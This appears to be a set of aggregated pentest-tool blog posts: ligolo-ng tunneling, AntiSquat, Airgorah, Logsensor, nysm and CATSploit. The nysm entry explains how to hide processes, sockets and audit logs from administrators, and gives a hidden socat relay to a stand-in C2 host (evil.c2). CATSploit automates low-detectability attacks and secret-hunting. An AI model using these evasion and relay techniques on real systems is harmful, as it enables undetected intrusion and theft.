      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
      β”‚ Interface 3 β”‚
      β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
      β”‚ Name β”‚ wlp3s0 β”‚
      β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
      β”‚ MTU β”‚ 1500 β”‚
      β”‚ Flags β”‚ up|broadcast|multicast β”‚
      β”‚ IPv4 Address β”‚ 192.168.0.30/24 β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

      Linux:

      $ sudo ip route add 192.168.0.0/24 dev ligolo

      Windows:

      > netsh int ipv4 show interfaces

      Idx MΓ©t MTU Γ‰tat Nom
      --- ---------- ---------- ------------ ---------------------------
      25 5 65535 connected ligolo

      > route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

      Start the tunnel on the proxy:

      [Agent : nchatelain@nworkstation] Β» start
      [Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

      You can now access the 192.168.0.0/24 agent network from the proxy server.

      $ nmap 192.168.0.0/24 -v -sV -n
      [...]
      $ rdesktop 192.168.0.123
      [...]

      Agent Binding/Listening

      You can listen to ports on the agent and redirect connections to your control/proxy server.

      In a ligolo session, use the listener_add command.

      The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

      [Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
      INFO[1208] Listener created on remote agent!

      On the proxy:

      $ nc -lvp 4321

      When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

      This is very useful when using reverse tcp/udp payloads.

      You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

      [Agent : nchatelain@nworkstation] Β» listener_list 
      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
      β”‚ Active listeners β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
      β”‚ # β”‚ AGENT β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
      β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234 β”‚ 127.0.0.1:4321 β”‚
      β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      [Agent : nchatelain@nworkstation] Β» listener_stop 0
      INFO[1505] Listener closed.

      Demo

      ligolo-ng_demo.mp4

      Does it require Administrator/root access ?

      On the agent side, no! Everything can be performed without administrative access.

      However, on your relay/proxy server, you need to be able to create a tun interface.

      Supported protocols/packets

      • TCP
      • UDP
      • ICMP (echo requests)

      Performance

      You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

      $ iperf3 -c 10.10.0.1 -p 24483
      Connecting to host 10.10.0.1, port 24483
      [ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
      [ ID] Interval Transfer Bitrate Retr Cwnd
      [ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
      [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
      [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
      [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
      [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
      [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
      [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
      [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
      [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
      - - - - - - - - - - - - - - - - - - - - - - - - -
      [ ID] Interval Transfer Bitrate Retr
      [ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
      [ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

      Caveats

Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent instead.

      When using nmap, you should use --unprivileged or -PE to avoid false positives.

      Todo

      • Implement other ICMP error messages (this will speed up UDP scans) ;
      • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
      • Add mTLS support.

      Credits

      • Nicolas Chatelain <nicolas -at- chatelain.me>


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

      By: Zion3R β€” January 25th 2024 at 11:30


      AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


      How to use

      • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
      • Install all dependencies by typing pip install -r requirements.txt.
      • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
• Create a file named .openai-key and paste your ChatGPT API key in there.
• (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your GoDaddy API key in there.
      • Create a file named β€˜domains.txt’. Type in a line-separated list of domains you’d like to scan.
      • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
      • Run antisquat using python3.8 antisquat.py domains.txt

      Examples:

      Let’s say you’d like to run antisquat on "flipkart.com".

      Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

AntiSquat generates several permutations of the domain, iterates through them one by one, and tries to extract all contact information from the page.
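
Typosquat permutation generation, in spirit, looks like the following minimal sketch (illustrative only; AntiSquat's actual generation and its NLP/ChatGPT scoring are more involved):

def permutations(domain):
    name, _, tld = domain.partition(".")
    results = set()
    # Character omission: flipkart -> lipkart, fipkart, ...
    for i in range(len(name)):
        results.add(name[:i] + name[i + 1:] + "." + tld)
    # Adjacent character swap: flipkart -> lfipkart, filpkart, ...
    for i in range(len(name) - 1):
        swapped = name[:i] + name[i + 1] + name[i] + name[i + 2:]
        results.add(swapped + "." + tld)
    # TLD swap
    for alt_tld in ("net", "org", "co"):
        results.add(name + "." + alt_tld)
    results.discard(domain)
    return results

print(sorted(permutations("flipkart.com"))[:10])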

      Test case:

A test case for amazon.com is attached. To run it without any API keys, simply run python3.8 test.py

      Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

      If you'd like to know more about the tool, make sure to check out our blog.

      Acknowledgements

      To know more about our Attack Surface Management platform, check out NVADR.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

      By: Zion3R β€” January 24th 2024 at 11:30


      Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

      It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

      ⭐ Don't forget to put a star if you like the project!

      Legal

Airgorah is designed to be used for testing and discovering flaws in networks you own. Performing attacks on WiFi networks you do not own is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

      Requirements

This software only works on Linux and requires root privileges to run.

      You will also need a wireless network card that supports monitor mode and packet injection.

      Installation

      The installation instructions are available here.

      Usage

      The documentation about the usage of the application is available here.

      License

      This project is released under MIT license.

      Contributing

If you have any questions about the usage of the application, do not hesitate to open a discussion.

If you want to report a bug or request a feature, do not hesitate to open an issue or submit a pull request.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

      By: Zion3R β€” January 13th 2024 at 11:30


      A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

      Features

• Login panel scanning for multiple hosts
• Proxy compatibility (HTTP, HTTPS)
• Login panel scanning is done with multiprocessing, so the script is super fast at scanning many URLs

A quick tutorial & screenshots are shown at the bottom, along with project contribution tips.

      Β 

      Installation

      git clone https://github.com/Mr-Robert0/Logsensor.git
      cd Logsensor && sudo chmod +x logsensor.py install.sh
      pip install -r requirements.txt
      ./install.sh

      Dependencies

      Β 

      Quick Tutorial

1. Scanning multiple hosts to detect login panels

• You can increase the number of threads (default 30)
• Run only the login detector module
      python3 logsensor.py -f <subdomains-list> 
      python3 logsensor.py -f <subdomains-list> -t 50
      python3 logsensor.py -f <subdomains-list> --login

      2. Targeted SQLi form scanning

• You can provide a specific login panel URL with the --sqli or -s flag to run only the SQLi form scanning module
• Turn on the proxy to see the requests
• Customize the username input of the login panel with its actual field name (default "username")
      python logsensor.py -u www.example.com/login --sqli 
      python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
      python logsensor.py -u www.example.com/login -s --inputname email

      View help

      python logsensor.py --help

      usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

      optional arguments:
      -u , --url Target URL (e.g. http://example.com/ )
      -f , --file Select a target hosts list file (e.g. list.txt )
      --proxy Proxy (e.g. http://127.0.0.1:8080)
      -l, --login run only Login panel Detector Module
      -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
      -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
      -t , --threads Number of threads (default 30)
      -h, --help Show this help message and exit

      Screenshots


      Development

      TODO

      1. adding "POST form SQli (Time based) scanning" and check for delay
      2. Fuzzing on Url Paths So as not to miss any login panel


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Nysm - A Stealth Post-Exploitation Container

      By: Zion3R β€” January 9th 2024 at 11:30


      A stealth post-exploitation container.

      Introduction

With the rise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of system administrators, not only by hiding eBPF, but much more:

      • bpftool
      • bpflist-bpfcc
      • ps
      • top
      • sockstat
      • ss
      • rkhunter
      • chkrootkit
      • lsof
      • auditd
      • etc...

      All these tools go blind to what goes through nysm. It hides:

      • New eBPF programs
• New eBPF maps
• New eBPF links
• New Auditd generated logs
• New PIDs
• New sockets

Warning: This tool is a simple demonstration of eBPF capabilities; as such, it is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.

      Β 

      Installation

      Requirements

      sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

      Linux headers

      cd ./nysm/src/
      bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

      Build

      cd ./nysm/src/
      make

      Usage

      nysm is a simple program to run before the intended command:

      Usage: nysm [OPTION...] COMMAND
      Stealth eBPF container.

      -d, --detach Run COMMAND in background
      -r, --rm Self destruct after execution
      -v, --verbose Produce verbose output
      -h, --help Display this help
      --usage Display a short usage message

      Examples

      Run a hidden bash:

      ./nysm bash

      Run a hidden ssh and remove ./nysm:

      ./nysm -r ssh user@domain

      Run a hidden socat as a daemon and remove ./nysm:

      ./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

      How it works

      In general

      As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.

To differentiate nysm events from the others, everything runs inside a separate PID namespace.

      Hide eBPF objects

      bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

      As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.

To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exits, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

      In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

      Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().
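
The effect of that next_id rewriting can be modelled in a few lines of userspace Python (an analogy of the behaviour described above, not the eBPF code itself; the IDs are invented):

KERNEL_IDS = [3, 7, 9, 12, 15]   # IDs of all loaded eBPF programs
HIDDEN_IDS = {9, 12}             # IDs created inside nysm

def get_next_id(start_id):
    # Model of BPF_PROG_GET_NEXT_ID with nysm's filter applied:
    # bpf_attr.next_id is rewritten so enumeration jumps straight
    # to the next ID that was not created in nysm.
    for candidate in KERNEL_IDS:
        if candidate > start_id and candidate not in HIDDEN_IDS:
            return candidate
    return None

current, visible = 0, []
while (current := get_next_id(current)) is not None:
    visible.append(current)
print(visible)  # [3, 7, 15] -- the hidden programs never appear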

      Hide Auditd logs

      Auditd receives its logs from recvfrom() which stores its messages in a buffer.

If the message received was generated by a nysm process through audit_log_end(), the message length in its nlmsghdr header is replaced with 0.

Hide PIDs

      Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

As getdents64() requires looping through all its files, the eBPF instruction limit is easily reached. Therefore, nysm uses tail calls before hitting it.
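
The record-length trick can be illustrated in userspace terms (a Python model of the idea; the real implementation patches the getdents64() result buffer from eBPF):

# Each /proc entry modelled as (name, record_length); in the real buffer the
# length field tells the reader where the next linux_dirent64 record starts.
dirents = [("1", 24), ("42", 24), ("1337", 24), ("2020", 24)]
HIDDEN = {"1337"}  # PIDs allocated inside nysm

def hide(entries):
    out = []
    for name, reclen in entries:
        if name in HIDDEN and out:
            # Grow the previous record so it swallows the hidden one:
            # the reader's pointer arithmetic then skips right over it.
            prev_name, prev_len = out[-1]
            out[-1] = (prev_name, prev_len + reclen)
        else:
            out.append((name, reclen))
    return out

print(hide(dirents))  # [('1', 24), ('42', 48), ('2020', 24)]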

      Hide sockets

Hiding sockets is a big word. In fact, open sockets are already hidden from many tools, as they cannot find the owning process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag, which returns all the currently open sockets. After that, ss receives the result through recvmsg() in a message buffer, and the returned value is the combined length of all these messages.

      Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

      These are collected from the connect() and bind() calls.

      Limitations

      Even with the best effort, nysm still has some limitations.

• Every tool that does not close its file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

      • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

      • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

      • Hiding ss recvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.

• Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided, as it would hide every non-nysm eBPF object.

      Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

      By: Zion3R β€” January 8th 2024 at 11:30


CATSploit is an automated penetration testing tool using the Cyber Attack Techniques Scoring (CATS) method that can be used without a pentester. Currently, pentesters implicitly select suitable attack techniques for the target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, and software versions collected by a scanner, and calculates score values for the capture (eVc) and detectability (eVd) of each attack technique for the target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without the hack knack (a professional pentester's skill).

      CATSploit automatically performs penetration tests in the following sequence:

1. Information gathering and prior information input. First, CATSploit gathers information about the target systems. It supports nmap and OpenVAS for information gathering, and also accepts prior information about the target systems if you have any.

2. Calculating score values of attack techniques. Using the information obtained in the previous phase and the attack techniques database, the evaluation values for capture (eVc) and detectability (eVd) of each attack technique are calculated for each target computer.

3. Selecting attack techniques by score and building an attack scenario. Attack techniques are selected and attack scenarios created according to pre-defined policies. For example, under a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) will be selected. (A toy sketch of this selection follows this list.)

4. Executing the attack scenario. CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase. It uses Metasploit as a framework, and the Metasploit API, to execute the actual attacks.
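
As a toy illustration of the scoring-and-selection idea (invented field names, not CATSploit's real model; the eVc/eVd values are borrowed from the example session later in this post):

scenarios = [
    {"id": "rmgrof", "eVc": 100.0, "eVd": 32.0},
    {"id": "joglhf", "eVc": 70.0,  "eVd": 60.0},
    {"id": "8jos4z", "eVc": 0.7,   "eVd": 72.8},
]

def pick(scenarios, policy):
    # "stealth" prefers the lowest detectability score (eVd);
    # "capture" prefers the highest capture score (eVc).
    if policy == "stealth":
        return min(scenarios, key=lambda s: s["eVd"])
    return max(scenarios, key=lambda s: s["eVc"])

# With these numbers, rmgrof wins under both policies.
print(pick(scenarios, "stealth")["id"])
print(pick(scenarios, "capture")["id"])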


Prerequisites

      CATSploit has the following prerequisites:

      • Kali Linux 2023.2a

      Installation

Metasploit, Nmap and OpenVAS are assumed to be installed with the Kali distribution.

      Installing CATSploit

      To install the latest version of CATSploit, please use the following commands:

Cloning and setup
      $ git clone https://github.com/catsploit/catsploit.git
      $ cd catsploit
      $ git clone https://github.com/catsploit/cats-helper.git
      $ sudo ./setup.sh

      Editing configuration file

CATSploit is a server-client application; the server reads its JSON configuration file at startup. In config.json, the following fields should be modified for your environment.

      • DBMS
        • dbname: database name created for CATSploit
        • user: username of PostgreSQL
  • password: password of PostgreSQL
        • host: If you are using a database on a remote host, specify the IP address of the host
      • SCENARIO
        • generator.maxscenarios: Maximum number of scenarios to calculate (*)
      • ATTACKPF
        • msfpassword: password of MSFRPCD
        • openvas.user: username of PostgreSQL
        • openvas.password: password of PostgreSQL
  • openvas.maxhosts: Maximum number of hosts to be tested at the same time (*)
  • openvas.maxchecks: Maximum number of test items to be tested at the same time (*)
• ATTACKDB
  • attack_db_dir: Path to the folder where AttackSteps are stored

      (*) Adjust the number according to the specs of your machine.

      Usage

      To start the server, execute the following command:

      $ python cats_server.py -c [CONFIG_FILE]

      Next, prepare another console, start the client program, and initiate a connection to the server.

      $ python catsploit.py -s [SOCKET_PATH]

      After successfully connecting to the server and initializing it, the session will start.

         _________  ___________       __      _ __
      / ____/ |/_ __/ ___/____ / /___ (_) /_
      / / / /| | / / \__ \/ __ \/ / __ \/ / __/
      / /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
      \____/_/ |_/_/ /____/ .___/_/\____/_/\__/
      /_/

      [*] Connecting to cats-server
      [*] Done.
      [*] Initializing server
      [*] Done.
      catsploit>

      The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

      usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

      positional arguments:
      {host,scenario,scan,plan,attack,post,reset,help,exit}

      options:
      -h, --help show this help message and exit

      I've posted the commands and options below as well for reference.

      host list:
      show information about the hosts
      usage: host list [-h]
      options:
      -h, --help show this help message and exit

      host detail:
      show more information about one host
      usage: host detail [-h] host_id
      positional arguments:
      host_id ID of the host for which you want to show information
      options:
      -h, --help show this help message and exit

      scenario list:
      show information about the scenarios
      usage: scenario list [-h]
      options:
      -h, --help show this help message and exit

      scenario detail:
      show more information about one scenario
      usage: scenario detail [-h] scenario_id
      positional arguments:
      scenario_id ID of the scenario for which you want to show information
      options:
      -h, --help show this help message and exit

      scan:
      run network-scan and security-scan
usage: scan [-h] [--port PORT] target_host [target_host ...]
      positional arguments:
      target_host IP address to be scanned
      options:
      -h, --help show this help message and exit
      --port PORT ports to be scanned

      plan:
      planning attack scenarios
      usage: plan [-h] src_host_id dst_host_id
      positional arguments:
      src_host_id originating host
      dst_host_id target host
      options:
      -h, --help show this help message and exit

      attack:
      execute attack scenario
      usage: attack [-h] scenario_id
      positional arguments:
      scenario_id ID of the scenario you want to execute

      options:
      -h, --help show this help message and exit

      post find-secret:
      find confidential information files that can be performed on the pwned host
      usage: post find-secret [-h] host_id
      positional arguments:
      host_id ID of the host for which you want to find confidential information
options:
      -h, --help show this help message and exit

      reset:
      reset data on the server
      usage: reset [-h] {system} ...
      positional arguments:
      {system} reset system
      options:
      -h, --help show this help message and exit

      exit:
      exit CATSploit
      usage: exit [-h]
      options:
      -h, --help show this help message and exit

      Examples

      In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

      catsploit> scan 192.168.0.0/24
      Network Scanning ... 100%
      [*] Total 2 hosts were discovered.
      Vulnerability Scanning ... 100%
      [*] Total 14 vulnerabilities were discovered.
      catsploit> host list
      ┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
      ┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
      β”‚ attacker β”‚ 0.0.0.0 β”‚ kali β”‚ kali 2022.4 β”‚ True β”‚
      β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ β”‚ Linux 3.10 - 4.11 β”‚ False β”‚
      β”‚ h_nhqyfq β”‚ 192.168.0.20 β”‚ β”‚ Microsoft Windows 7 SP1 β”‚ False β”‚
      └──────────┴ β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


      catsploit> host detail h_exbiy6
      ┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
      ┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
      ┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
      β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ ubuntu β”‚ ubuntu 14.04 β”‚ False β”‚
└──────────┴──────────────┴──────────┴──────────────┴───────┘

      [IP address]
      ┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
      ┃ ipv4 ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
      ┑━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
      β”‚ 192.168.0.10 β”‚ β”‚ β”‚ β”‚
      └──────────── β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      [Open ports]
      ┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
      ┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
      ┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ ftp β”‚ ProFTPD β”‚ 1.3.5 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ ssh β”‚ OpenSSH β”‚ 6.6.1p1 Ubuntu 2ubuntu2.10 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ http β”‚ Apache httpd β”‚ 2.4.7 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 445 β”‚ netbios-ssn β”‚ Samba smbd β”‚ 3.X - 4.X β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ ipp β”‚ CUPS β”‚ 1.7 β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      [Vulnerabilities]
      ┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
      ┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
      ┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 0 β”‚ TCP Timestamps Information Disclosure β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ FTP Unencrypted Cleartext Login β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak MAC Algorithm(s) Supported (SSH) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Encryption Algorithm(s) Supported (SSH) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Host Key Algorithm(s) (SSH) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Test HTTP dangerous methods β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β”‚ CVE-2014-3704 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Sensitive File Disclosure (HTTP) β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Unprotected Web App / Device Installers (HTTP) β”‚ N/A β”‚
